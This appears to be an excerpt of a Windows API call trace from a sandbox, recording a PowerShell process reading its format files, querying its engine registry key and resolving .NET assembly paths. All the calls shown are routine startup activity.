	[0339.252] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2ec
	[0339.252] GetFileType (hFile=0x2ec) returned 0x1
	[0339.252] SetErrorMode (uMode=0x1) returned 0x1
	[0339.252] GetFileType (hFile=0x2ec) returned 0x1
	[0339.252] ReadFile (in: hFile=0x2ec, lpBuffer=0x33f55a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33f55a0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.253] ReadFile (in: hFile=0x2ec, lpBuffer=0x33f55a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33f55a0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.253] ReadFile (in: hFile=0x2ec, lpBuffer=0x33f55a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33f55a0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.254] ReadFile (in: hFile=0x2ec, lpBuffer=0x33f55a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33f55a0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.254] ReadFile (in: hFile=0x2ec, lpBuffer=0x33f55a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33f55a0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.255] ReadFile (in: hFile=0x2ec, lpBuffer=0x33f55a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33f55a0*, lpNumberOfBytesRead=0x1acdb8*=0xfb2, lpOverlapped=0x0) returned 1
	[0339.255] ReadFile (in: hFile=0x2ec, lpBuffer=0x33f4cba, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33f4cba*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0339.255] ReadFile (in: hFile=0x2ec, lpBuffer=0x33f55a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33f55a0*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0339.255] CloseHandle (hObject=0x2ec) returned 1
	[0339.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0339.255] SetErrorMode (uMode=0x1) returned 0x1
	[0339.256] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acd60 | out: lpFileInformation=0x1acd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0339.256] SetErrorMode (uMode=0x1) returned 0x1
	[0339.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0339.256] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ace48 | out: phkResult=0x1ace48*=0x2ec) returned 0x0
	[0339.256] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acdcc, lpData=0x0, lpcbData=0x1acdc8*=0x0 | out: lpType=0x1acdcc*=0x1, lpData=0x0, lpcbData=0x1acdc8*=0x56) returned 0x0
	[0339.256] CoTaskMemAlloc (cb=0x5a) returned 0x1b814820
	[0339.588] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd9c, lpData=0x1b814820, lpcbData=0x1acd98*=0x56 | out: lpType=0x1acd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd98*=0x56) returned 0x0
	[0339.588] CoTaskMemFree (pv=0x1b814820) 
	[0339.588] RegCloseKey (hKey=0x2ec) returned 0x0
	[0339.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0339.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0339.590] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x883b497c, Data2=0x7061, Data3=0x4154, Data4=([0]=0xa2, [1]=0x1a, [2]=0x2b, [3]=0x41, [4]=0xf9, [5]=0x35, [6]=0x5f, [7]=0x29))) returned 0x0
	[0339.596] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x4c302ea8, Data2=0x64bc, Data3=0x4f25, Data4=([0]=0x8a, [1]=0x3f, [2]=0x2f, [3]=0x18, [4]=0x16, [5]=0xc7, [6]=0x82, [7]=0x46))) returned 0x0
	[0339.597] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x9c65299a, Data2=0x74c3, Data3=0x4be3, Data4=([0]=0x8a, [1]=0x67, [2]=0x76, [3]=0xd8, [4]=0xb3, [5]=0xf7, [6]=0x91, [7]=0xeb))) returned 0x0
	[0339.598] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xfd90b1ee, Data2=0xf00e, Data3=0x42d0, Data4=([0]=0x97, [1]=0x60, [2]=0xa5, [3]=0xbc, [4]=0xc, [5]=0x3e, [6]=0xa7, [7]=0x53))) returned 0x0
	[0339.598] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x9d69be5b, Data2=0x85b4, Data3=0x4a5e, Data4=([0]=0x89, [1]=0x3d, [2]=0xf7, [3]=0xd5, [4]=0xa6, [5]=0x98, [6]=0x11, [7]=0xc7))) returned 0x0
	[0339.598] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x3ef8ae88, Data2=0x795f, Data3=0x4f80, Data4=([0]=0xa6, [1]=0x22, [2]=0x5c, [3]=0xd8, [4]=0xe8, [5]=0xd2, [6]=0x23, [7]=0xa4))) returned 0x0
	[0339.599] SetErrorMode (uMode=0x1) returned 0x1
	[0339.599] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2ec
	[0339.599] GetFileType (hFile=0x2ec) returned 0x1
	[0339.599] SetErrorMode (uMode=0x1) returned 0x1
	[0339.608] GetFileType (hFile=0x2ec) returned 0x1
	[0339.608] ReadFile (in: hFile=0x2ec, lpBuffer=0x3441300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x3441300*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.609] ReadFile (in: hFile=0x2ec, lpBuffer=0x3441300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x3441300*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.610] ReadFile (in: hFile=0x2ec, lpBuffer=0x3441300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x3441300*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.610] ReadFile (in: hFile=0x2ec, lpBuffer=0x3441300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x3441300*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.611] ReadFile (in: hFile=0x2ec, lpBuffer=0x3441300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x3441300*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.611] ReadFile (in: hFile=0x2ec, lpBuffer=0x3441300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x3441300*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.611] ReadFile (in: hFile=0x2ec, lpBuffer=0x3441300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x3441300*, lpNumberOfBytesRead=0x1acdb8*=0xaca, lpOverlapped=0x0) returned 1
	[0339.611] ReadFile (in: hFile=0x2ec, lpBuffer=0x3440932, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x3440932*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0339.611] ReadFile (in: hFile=0x2ec, lpBuffer=0x3441300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x3441300*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0339.611] CloseHandle (hObject=0x2ec) returned 1
	[0339.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0339.612] SetErrorMode (uMode=0x1) returned 0x1
	[0339.612] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acd60 | out: lpFileInformation=0x1acd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0339.612] SetErrorMode (uMode=0x1) returned 0x1
	[0339.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0339.612] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ace48 | out: phkResult=0x1ace48*=0x2ec) returned 0x0
	[0339.612] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acdcc, lpData=0x0, lpcbData=0x1acdc8*=0x0 | out: lpType=0x1acdcc*=0x1, lpData=0x0, lpcbData=0x1acdc8*=0x56) returned 0x0
	[0339.612] CoTaskMemAlloc (cb=0x5a) returned 0x1b814820
	[0339.612] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd9c, lpData=0x1b814820, lpcbData=0x1acd98*=0x56 | out: lpType=0x1acd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd98*=0x56) returned 0x0
	[0339.612] CoTaskMemFree (pv=0x1b814820) 
	[0339.613] RegCloseKey (hKey=0x2ec) returned 0x0
	[0339.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0339.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0339.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0339.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0339.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0340.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0340.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0340.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0340.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0340.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0340.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0340.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0340.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0340.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0340.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0340.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0340.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0340.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0340.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0340.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0340.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0340.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0340.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0340.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0340.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.195] VirtualQuery (in: lpAddress=0x1ab8e0, lpBuffer=0x1ac7a0, dwLength=0x30 | out: lpBuffer=0x1ac7a0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0341.196] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x6092a470, Data2=0x8b5e, Data3=0x4cce, Data4=([0]=0xb8, [1]=0xd, [2]=0xff, [3]=0xc, [4]=0xe4, [5]=0x25, [6]=0xab, [7]=0x19))) returned 0x0
	[0341.197] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xb269266f, Data2=0x8d0c, Data3=0x40b3, Data4=([0]=0x8e, [1]=0xc7, [2]=0x5e, [3]=0xd1, [4]=0xfb, [5]=0x5, [6]=0xdc, [7]=0x16))) returned 0x0
	[0341.197] VirtualQuery (in: lpAddress=0x1aba90, lpBuffer=0x1ac950, dwLength=0x30 | out: lpBuffer=0x1ac950*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0341.198] VirtualQuery (in: lpAddress=0x1aba90, lpBuffer=0x1ac950, dwLength=0x30 | out: lpBuffer=0x1ac950*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0341.200] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x8a58351c, Data2=0xd604, Data3=0x4c01, Data4=([0]=0xb8, [1]=0xb0, [2]=0xb6, [3]=0xef, [4]=0xb0, [5]=0xba, [6]=0xeb, [7]=0x1a))) returned 0x0
	[0341.202] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x63b22bc5, Data2=0x209e, Data3=0x4c2f, Data4=([0]=0xb9, [1]=0xc2, [2]=0xe6, [3]=0xba, [4]=0x99, [5]=0x7a, [6]=0xc3, [7]=0x54))) returned 0x0
	[0341.202] VirtualQuery (in: lpAddress=0x1abce0, lpBuffer=0x1acba0, dwLength=0x30 | out: lpBuffer=0x1acba0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0341.203] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0341.204] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0341.204] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x4cf0a86c, Data2=0xcc95, Data3=0x4f2a, Data4=([0]=0x9b, [1]=0xb4, [2]=0xfe, [3]=0x91, [4]=0x15, [5]=0xca, [6]=0x70, [7]=0x97))) returned 0x0
	[0341.204] VirtualQuery (in: lpAddress=0x1abce0, lpBuffer=0x1acba0, dwLength=0x30 | out: lpBuffer=0x1acba0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0341.204] VirtualQuery (in: lpAddress=0x1abb00, lpBuffer=0x1ac9c0, dwLength=0x30 | out: lpBuffer=0x1ac9c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
